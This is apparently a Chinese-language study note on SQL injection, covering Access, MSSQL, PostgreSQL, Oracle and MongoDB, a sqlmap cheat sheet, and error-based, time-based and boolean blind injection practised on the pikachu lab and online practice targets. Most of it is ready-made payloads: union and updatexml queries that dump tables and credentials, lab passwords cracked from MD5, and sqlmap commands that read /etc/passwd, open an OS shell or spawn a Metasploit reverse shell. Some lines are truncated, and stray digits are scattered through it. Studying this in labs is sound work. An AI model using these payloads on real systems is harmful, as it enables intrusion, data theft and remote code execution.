多种数据库注入和报错注入
J_R_R
![[Pasted image 20250330205748.png]]
一、简要学习各种数据库的注入特点
access,mysql, mssql , mongoDB,postgresql, sqlite,oracle,sybase等
1、access注入
Access:
- 由微软开发的一个==关系数据库管理系统==。
- ==数据库存储在一个文件中==,易于备份和迁移。
Access数据库 一个文件一个数据库
表名
列名
数据
access 数据库都是存放在网站目录下,后缀格式为 mdb,asp,asa,可以通过一些暴库手段、目录猜解等直接下载数据库,
access:不能跨库攻击,没有数据库记录信息系统表
access三大攻击手法
1.access注入攻击片段-联合查询法
2.access注入攻击片段-逐字猜解法
3.工具类的使用注入(推荐)
Access注入攻击方式
主要有:union 注入、http header 注入、偏移注入等
#补充:Access暴力猜解不出的问题?
Access扁移注入:解决列名获取不到的情况
查看登陆框源代码的表单值或观察URL特征等也可以针对表或列获取不到的情况
参考笔记:https://www.fujieace.com/penetration-test/access-offset-injection.html
2、MSSQL注入
参考文档:https://www.cnblogs.com/xishaonian/p/6173644.html
判断数据库类型
判断数据库版本
①判断数据库类型
and exists (select * from sysobjects)--返回正常为mssql(也名sql server)
and exists (select count(* ) from sysobjects) --有时上面那个语句不行就试试这个哈
②判断数据库版本
and 1=@@version--这个语句要在有回显的模式下才可以哦
and substring((select @@version),22,4)='2008'--适用于无回显模式,后面的2008就是数据库版本,返回正常就是2008的复制代码第一条语句执行效果图(类似):第二条语句执行效果图:(如果是2008的话就返回正常)
③获取所有数据库的个数 (一下3条语句可供选择使用)
- and 1=(select quotename(count(name)) from master..sysdatabases)--
- and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases) --
- and 1=(select str(coun、 and 1=(select quotename(count(name)) from master..sysdatabases where dbid>5)--
and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>5) --
and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where dbid>5) --
说明:dbid从1-4的数据库一般为系统数据库.
⑤获取数据库 (该语句是一次性获取全部数据库的,且语句只适合>=2005,两条语句可供选择使用)
and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))--
⑥获取当前数据库
and db_name()>0
and 1=(select db_name())--
⑦获取当前数据库中的表(有2个语句可供选择使用)【下列语句可一次爆数据库所有表(只限于mssql2005及以上版本)】
and 1=(select quotename(name) from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))--复制代码测试效果图:得到 3个敏感的表:Whir_Sec_Users/Whir_Mem_Member/Whir_Mem_MemberGroup
⑧获得表里的列
一次爆指定表的所有列(只限于mssql2005及以上版本):
and 1=(select quotename(name) from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--
效果图:既然有账户信息,我就不管是不是管理员的的了,我帖子的目的不是为了得到管理员的信息,只是为了演示可以通过这个方法来获取相关信息。
⑨获取指定数据库中的表的列的数据库
逐条爆指定表的所有字段的数据(只限于mssql2005及以上版本):
and 1=(select top 1 * from 指定数据库..指定表名 where排除条件 FOR XML PATH(''))--
一次性爆N条所有字段的数据(只限于mssql2005及以上版本):
and 1=(select top N * from 指定数据库..指定表名 FOR XML PATH(''))--复制代码第一条语句:and 1=(select top 1 * from 指定数据库..指定表名 FOR XML PATH(''))--测试效果图:----------------------------------加上where条件筛选结果出来会更加好,如:where and name like '%user%' 就会筛选出含有user关键词的出来。用在筛选表段时很不错。
3、postgresql注入
找注入点
and 1=1
![[Pasted image 20250331214423.png]]
有回显
and 1=2
![[Pasted image 20250331214451.png]]
order by猜列
4列
![[Pasted image 20250331214712.png]]
![[Pasted image 20250331214806.png]]
测试回显
用select语句测一下回显。跟mysql有些不一样,postgreSQL是用null来测试回显点的。
and 1=2 union select null,'null','null',null
![[Pasted image 20250331214905.png]]
依次给每个null加上单引号。
and 1=2 union select null,'null','null',null
![[Pasted image 20250331215035.png]]
第二个和第三个位置有回显,接下来进行注入
数据库信息获取
version()数据库版本
union select null,null,version(),null
![[Pasted image 20250331215114.png]]
current_user数据库用户
union select null,null,current_user,null
![[Pasted image 20250331215204.png]]
current_database()数据库名
union select null,null,current_database(),null
![[Pasted image 20250331215253.png]]
查数据
1.查数据库名
union select null,null,string_agg(datname,','),null from pg_database
![[Pasted image 20250331215417.png]]
2.查表名
union select null,null,string_agg(tablename,','),null from pg_tables where schemaname='public'
![[Pasted image 20250331215532.png]]
union select null,null,string_agg(relname,','),null from pg_stat_user_tables
![[Pasted image 20250331215611.png]]
3.查列名
union select null,null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'
![[Pasted image 20250331215648.png]]
4.查数据
union select null,string_agg(name,','),string_agg(password,','),null from reg_users
![[Pasted image 20250331221910.png]]
MD5解密:
1c63129ae9db9c60c3e8aa94d3e00495(1qaz2wsx)
8857b5b9d2e7ab7e6586583271d12622(205899)
账号登录:
账号:mozhe1
密码:205899
![[Pasted image 20250331222851.png]]
用sqlmap
c: \Users (HellocTF 0s\Desktoplsqlmaplsqlmapproject-sqlmap-04b293d>python sqlmap.py -u http://124.70.71.251:46613/new_list.php?id=1
![[Pasted image 20250401213449.png]]
粘贴注入语句并对网站注入
4、Oracle注入
参考文档:https://www.cnblogs.com/peterpan0707007/p/8242119.html
一、Union联合查询
order by 定字段
and 1=2 union select null,null..... from dual 然后一个一个去判断字段类型,方法如下
and 1=2 union select 'null',null...... from dual 返回正常,说明第一个字段是字符型,反之为数字型
第一个字段是字符型,判断第二个字段类型:
and 1=2 union select 'null','null'...... from dual 返回正常,说明第二个字段是字符型,反之为数字型
第一个字段是数字型,判断第二个字段类型:
and 1=2 union select null,'null'...... from dual 返回正常,说明第二个字段是字符型,反之为数字型
判断第n个字段的类型,依次类推即可
确定回显位,假设当前共2个字段,全是数字型,判断方式如下:
and 1=2 union select 1,2 from dual
假设回显位是2,爆当前数据库中的第一个表:
and 1=2 union select 1,(select table_name from user_tables where rownum=1) from dual
爆当前数据库中的第二个表:
and 1=2 union select 1,(select table_name from user_tables where rownum=1 and table_name not in ('第一个表')) from dual
以此类推去爆第n个表
爆某表中的第一个字段:
and 1=2 union select 1,(select column_name from user_tab_columns where rownum=1 and table_name='表名(大写的)') from dual
爆某表中的第二个字段:
and 1=2 union select 1,(select column_name from user_tab_columns where rownum=1 and table_name='表名' and column_name not in ('第一个字段')) from dual
爆其它字段以此类推
爆某表中的第一行数据:
and 1=2 union select 1,字段1||字段2...||字段n from 表名 where rownum=1 --连接多个字段用到的连接符号是||,在oracle数据库中,concat函数只能连接两个字符串
通过字段名找到对应表:
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’;
查询第N行:
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — 查询第9行(从1开始数)
当前用户:
SELECT user FROM dual;
列出所有用户:
SELECT username FROM all_users ORDER BY username;
列出数据库
SELECT DISTINCT owner FROM all_tables;
列出表名:
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
列出字段名:
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
定位DB文件:
SELECT name FROM V$DATAFILE;
5、mongoDB注入
参考文档:https://www.cnblogs.com/wefeng/p/11503102.html
SQLmap不能识别MongoDB这里介绍nosqlattack:https://github.com/youngyangyang04/NoSQLAttack
┌──(root💀kali)-[~/hackbar]
└─# sqlmap -u http://219.153.49.228:47077/new_list.php?id=1 --batch
[13:53:16] [INFO] testing connection to the target URL
[13:53:16] [INFO] testing if the target URL content is stable
[13:53:16] [INFO] target URL content is stable
[13:53:16] [INFO] testing if GET parameter 'id' is dynamic
[13:53:16] [INFO] GET parameter 'id' appears to be dynamic
[13:53:16] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[13:53:16] [INFO] testing for SQL injection on GET parameter 'id'
[13:53:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:53:17] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:53:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[13:53:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:53:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[13:53:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:53:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[13:53:18] [INFO] testing 'Generic inline queries'
[13:53:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[13:53:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[13:53:19] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[13:53:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[13:53:19] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:53:19] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[13:53:19] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[13:53:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:53:20] [WARNING] GET parameter 'id' does not seem to be injectable
[13:53:20] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[13:53:20] [WARNING] your sqlmap version is outdated
nosqlattack
二、SQLmap使用方法
基本操作笔记:-u #注入点
-f #指纹判别数据库类型
-b #获取数据库版本信息
-p #指定可测试的参数(?page=1&id=2 -p "page,id")
-D "" #指定数据库名
-T "" #指定表名
-C "" #指定字段
-s "" #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s "xx.log" 恢复:-s "xx.log" --resume)
--level=(1-5) #要执行的测试水平等级,默认为1
--risk=(0-3) #测试执行的风险等级,默认为1
--time-sec=(2,5) #延迟响应,默认为5
--data #通过POST发送数据
--columns #列出字段
--current-user #获取当前用户名称
--current-db #获取当前数据库名称
--users #列数据库所有用户
--passwords #数据库用户所有密码
--privileges #查看用户权限(--privileges -U root)
-U #指定数据库用户
--dbs #列出所有数据库
--tables -D "" #列出指定数据库中的表
--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段
--dump-all #列出所有数据库所有表
--exclude-sysdbs #只列出用户自己新建的数据库和表
--dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T users -D master -C surname)
--dump -T "" -D "" --start 2 --top 4 # 列出指定数据库的表的2-4字段的数据
--dbms #指定数据库(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)
--os #指定系统(Linux,Windows)
-v #详细的等级(0-6)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容
--privileges #查看权限
--is-dba #是否是数据库管理员
--roles #枚举数据库用户角色
--udf-inject #导入用户自定义函数(获取系统权限)
--union-check #是否支持union 注入
--union-cols #union 查询表记录
--union-test #union 语句测试
--union-use #采用union 注入
--union-tech orderby #union配合order by
--data "" #POST方式提交数据(--data "page=1&id=2")
--cookie "用;号分开" #cookie注入(--cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”)
--referer "" #使用referer欺骗(--referer "http://www.baidu.com")
--user-agent "" #自定义user-agent
--proxy "http://127.0.0.1:8118" #代理注入
--string="" #指定关键词,字符串匹配.
--threads #采用多线程(--threads 3)
--sql-shell #执行指定sql命令
--sql-query #执行指定的sql语句(--sql-query "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" )
--file-read #读取指定文件
--file-write #写入本地文件(--file-write /test/test.txt --file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)
--file-dest #要写入的文件绝对路径
--os-cmd=id #执行系统命令
--os-shell #系统交互shell
--os-pwn #反弹shell(--os-pwn --msf-path=/opt/framework/msf3/)
--msf-path= #matesploit绝对路径(--msf-path=/opt/framework/msf3/)
--os-smbrelay #
--os-bof #
--reg-read #读取win系统注册表
--priv-esc #
--time-sec= #延迟设置 默认--time-sec=5 为5秒
-p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" #指定user-agent注入
--eta #盲注
/pentest/database/sqlmap/txt/
common-columns.txt 字段字典
common-outputs.txt
common-tables.txt 表字典
keywords.txt
oracle-default-passwords.txt
user-agents.txt
wordlist.txt
常用语句 :
1./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db --users --passwords --dbs -v 0
2./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --passwords -U root --union-use -v 2
3./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --dump -T users -C username -D userdb --start 2 --stop 3 -v 2
4./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --dump -C "user,pass" -v 1 --exclude-sysdbs
5./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --sql-shell -v 2
6./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --file-read "c:\boot.ini" -v 2
7./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --file-write /test/test.txt --file-dest /var/www/html/1.txt -v 2
8./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-cmd "id" -v 1
9./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-shell --union-use -v 2
10./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 --priv-esc -v 1
11./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 -v 1
12./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-bof --msf-path=/opt/framework/msf3 -v 1
13./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --reg-add --reg-key="HKEY_LOCAL_NACHINE\SOFEWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
14./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --eta
15./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
16./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"
17./sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
18./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3
19./sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1
20./sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner
21./sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --cookie="PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low" --string='xx' --dbs --level=3 -p "uid"
简单的注入流程 :
1.读取数据库版本,当前用户,当前数据库
sqlmap -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db -v 1
2.判断当前数据库用户权限
sqlmap -u http://www.xxxxx.com/test.php?p=2 --privileges -U 用户名 -v 1
sqlmap -u http://www.xxxxx.com/test.php?p=2 --is-dba -U 用户名 -v 1
3.读取所有数据库用户或指定数据库用户的密码
sqlmap -u http://www.xxxxx.com/test.php?p=2 --users --passwords -v 2
sqlmap -u http://www.xxxxx.com/test.php?p=2 --passwords -U root -v 2
4.获取所有数据库
sqlmap -u http://www.xxxxx.com/test.php?p=2 --dbs -v 2
5.获取指定数据库中的所有表
sqlmap -u http://www.xxxxx.com/test.php?p=2 --tables -D mysql -v 2
6.获取指定数据库名中指定表的字段
sqlmap -u http://www.xxxxx.com/test.php?p=2 --columns -D mysql -T users -v 2
7.获取指定数据库名中指定表中指定字段的数据
sqlmap -u http://www.xxxxx.com/test.php?p=2 --dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log" -v 2
8.file-read读取web文件
sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-read "/etc/passwd" -v 2
9.file-write写入文件到web
sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-write /localhost/mm.php --file使用sqlmap绕过防火墙进行注入测试:
三、简要学习各种注入工具的使用指南
1、jsql工具安装使用
┌──(root💀kali)-[~/hackbar]
└─# apt-get -f install jsql
正在读取软件包列表... 完成
正在分析软件包的依赖关系树
正在读取状态信息... 完成
下列【新】软件包将被安装:
jsql
升级了 0 个软件包,新安装了 1 个软件包,要卸载 0 个软件包,有 1573 个软件包未被升级。
需要下载 2,500 B 的归档。
解压缩后会消耗 9,216 B 的额外空间。
获取:1 https://mirrors.aliyun.com/kali kali-rolling/main amd64 jsql all 0.82-0kali2 [2,500 B]
已下载 2,500 B,耗时 2秒 (1,099 B/s)
正在选中未选择的软件包 jsql。
(正在读取数据库 ... 系统当前共安装有 307905 个文件和目录。)
准备解压 .../jsql_0.82-0kali2_all.deb ...
正在解压 jsql (0.82-0kali2) ...
正在设置 jsql (0.82-0kali2) ...
启动直接数据jsql
对一些简单的注入有用对于post注入的效果不好
2、pangolin工具使用
能够做一些简单的SQL注入、对于post注入效果也不是很好,另外执行的速度也很慢,只能在window平台使用。
熟悉工具的支持库,注入模式,优缺点等
sqlmap, NoSQLAttack , Pangolin等
报错盲注
一、知识点
1、SQL语句网站应用
select查询数据
在网站应用中进行数据显示查询操作
例: select * from news where id=$id
insert插入数据
在网站应用中进行用户注册添加等操作
例: insert into news (id, url,text) values ( 2,'x','$t')
delete删除数据
后台管理里面删除文章删除用户等操作
例: delete from news where id=$id
update更新数据
会员或后台中心数据同步或缓存等操作
例: update user set pwd='$p' where id=2 and username=' admin'
order by排序数据
一般结合表名或列名进行数据排序操作
例: select * from news order by $id
例: select id , name , price from news order by $order
二、SQL语句盲注
盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。我们可以知道盲注分为以下三类:
1、基于布尔的sQL盲注-逻辑判断 regexp, like , ascii,left, ord , mid
2、基于时间的sQL盲注-延时判断 if ,sleep
3、基于报错的sQL盲注-报错回显 floor, updatexml, extractvalue
参考地址:https://www.jianshu.com/p/bc35f8dd4f7c https://developer.aliyun.com/article/692723
首先了解下updatexml()函数1
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数: XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数: XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数: new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
改变XML_document中符合XPATH_string的值
注入语句为:
updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
其中的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
使用pikachu靶场进行测试:
1、insert语句
insert插入数据
在网站应用中进行用户注册添加等操作
![[Pasted image 20250403172023.png]]
用burp抓取数据包、并修改数据包
'or updatexml(1,concat(0x7e,database(),0x7e),0) or'
username=jrr'or updatexml(1,concat(0x7e,database(),0x7e),0) or'&password=1234&sex=man&phonenum=123&email=%E6%B1%9F%E8%8B%8F&add=%E5%B8%B8%E5%B7%9E&submit=submit
![[Pasted image 20250403172829.png]]
'or updatexml(1,concat(0x7e,version(),0x7e),0) or'
username=jrr'or updatexml(1,concat(0x7e,version(),0x7e),0) or'&password=1234&sex=man&phonenum=123&email=%E6%B1%9F%E8%8B%8F&add=%E5%B8%B8%E5%B7%9E&submit=submit
![[Pasted image 20250403173107.png]]
'or updatexml(1,concat(0x7e,user(),0x7e),0) or'
username=jrr'or updatexml(1,concat(0x7e,user(),0x7e),0) or'&password=1234&sex=man&phonenum=123&email=%E6%B1%9F%E8%8B%8F&add=%E5%B8%B8%E5%B7%9E&submit=submit
![[Pasted image 20250403173210.png]]
2、update语句
登录后
修改信息,抓包
![[Pasted image 20250403174408.png]]
发送到repeter模块当中,修改数据包
原理基本一致
'or updatexml(1,concat(0x7e,database(),0x7e),0) or'
![[Pasted image 20250403174601.png]]
3、delete语句
![[Pasted image 20250403174829.png]]
payload: 56 or updatexml (1,concat(0x7e,datebase()),0)
且在BurpSuite中Ctrl+U 对payload进行url编码:+or+updatexml+(1,concat(0x7e,datebase()),0)
![[Pasted image 20250403175749.png]]
三、SQL时间盲注
1、sleep语句
mysql> select * from member where id=1;
+----+----------+----------------------------------+-----+-------------+---------+-------------------+
| id | username | pw | sex | phonenum | address | email |
+----+----------+----------------------------------+-----+-------------+---------+-------------------+
| 1 | vince | e10adc3949ba59abbe56e057f20f883e | boy | 18626545453 | chain | vince@pikachu.com |
+----+----------+----------------------------------+-----+-------------+---------+-------------------+
1 row in set (0.00 sec) //set (0.00 sec):响应时间
mysql> select * from member where id=1 and sleep(1);
Empty set (1.02 sec)
mysql> select * from member where id=1 and sleep(2);
Empty set (2.02 sec)
2、if语句
mysql> select if(database()='pikachu',123,456);
+----------------------------------+
| if(database()='pikachu',123,456) |
+----------------------------------+
| 123 |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select if(database()='a',123,456);
+----------------------------+
| if(database()='a',123,456) |
+----------------------------+
| 456 |
+----------------------------+
1 row in set (0.00 sec)
3.if+sleep语句
mysql> select * from member where id=1 and sleep(if(database()='a',1,0));
Empty set (0.00 sec)
mysql> select * from member where id=1 and sleep(if(database()='pikachu',5,0));
Empty set (1.00 sec)
语句的意思就是如果数据是pikachu就延迟5秒输出,不是的话就立即返回,但是在实际渗透过程中由于受到网络的影响时间注入不是很靠谱,
参考:
like 'ros' #判断ro或ro...是否成立
regexp '^xiaodi [a-z]' #匹配xiaodi及xiaodi...等if(条件,5,0)
sleep (5) #sQL语句延时执行s秒
mid (a, b, c) #从位置b开始,截取a字符串的c位
substr( a,b, c) #从b位置开始,截取字符串a的c长度
left (database(),1), database() #left(a,b)从左侧截取a的前b位
length(database ())=8 #判断数据库database ()名的长度
ord=ascii ascii(x)=97 #判断x的ascii码是否等于97
4.if+mid+sleep
判断数据库名称是不是以p开头如果是的话就延迟五秒输出。
mysql> select database();
+------------+
| database() |
+------------+
| pikachu |
+------------+
1 row in set (0.00 sec)
mysql> select * from users where id=1 and sleep(if(mid(database(),1,1)='p',5,0));
Empty set (5.00 sec)
四、布尔盲注
布尔(Boolean)型是计算机里的一种数据类型,只有True(真)和False(假)两个值。一般也称为逻辑型。
页面在执行sql语句后,只显示两种结果,这时可通过构造逻辑表达式的sql语句来判断数据的具体内容。
布尔注入用到的函数:
mid(str,start,length) :字符串截取
ORD() :转换成ascii码
Length() :统计长度
version() :查看数据库版本
database() :查看当前数据库名
user() :查看当前用户
123456
布尔注入流程:
猜解获取数据库长度
' or length(database()) > 8 --+ :符合条件返回正确,反之返回错误
1
猜解数据库名
'or mid(database(),1,1)= 'z' --+ :因为需要验证的字符太多,所以转化为ascii码验证
'or ORD(mid(database(),1,1)) > 100 --+ :通过确定ascii码,从而确定数据库名
12
猜解表的总数
'or (select count(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()) = 2 --+ :判断表的总数
1
猜解第一个表名的长度
'or (select length(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1) = 5 --+
'or (select length(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1) = 5 --+ (第二个表)
12
猜解第一个表名
'or mid((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA = database() limit 0,1 ),1,1) = 'a' --+
或者
'Or ORD(mid(select TABLE_NAME from information_schema.TABLES where
TABLE_SCHEMA = database() limit 0,1),1,1)) >100 --+
1234
猜解表的字段的总数
'or (select count(column_name) from information_schema.COLUMNS where TABLE_NAME='表名') > 5 --+
1
猜解第一个字段的长度
'or (select length(column_name) from information_schema.COLUMNS where TABLE_NAME='表名' limit 0,1) = 10 --+
'or (select length(column_name) from information_schema.COLUMNS where TABLE_NAME='表名' limit 1,1) = 10 --+ (第二个字段)
12
猜解第一个字段名
'or mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME = '表名' limit 0,1),1,1) = 'i' --+
或者
'or ORD(mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME = '表名' limit 0,1),1,1)) > 100 --+
123
猜解直接猜测字段名
' or (select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='表名' limit 1,1) = 'username' --+
1
猜解内容长度
假如已经知道字段名为 id username password
'or (select Length(concat(username,"---",password)) from admin limit 0,1) = 16 --+
12
猜解内容
'or mid((select concat(username,"-----",password) from admin limit 0,1),1,1) = 'a' --+
或者
'or ORD(mid((select concat(username,"-----",password) from admin limit 0,1),1,1)) > 100 --+ ASCII码猜解
123
也可以直接猜测内容
'or (Select concat(username,"-----",password) from admin limit 0,1 ) = 'admin-----123456' --+
1